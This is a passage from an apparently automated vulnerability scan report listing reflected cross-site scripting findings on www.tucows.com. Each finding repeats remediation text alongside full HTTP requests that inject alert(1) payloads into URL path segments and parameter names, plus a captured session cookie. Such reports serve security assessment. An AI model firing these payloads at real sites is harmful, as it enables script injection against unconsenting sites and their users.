Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/includes/js/xdocsize.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:58 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/includes/js/yetii.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
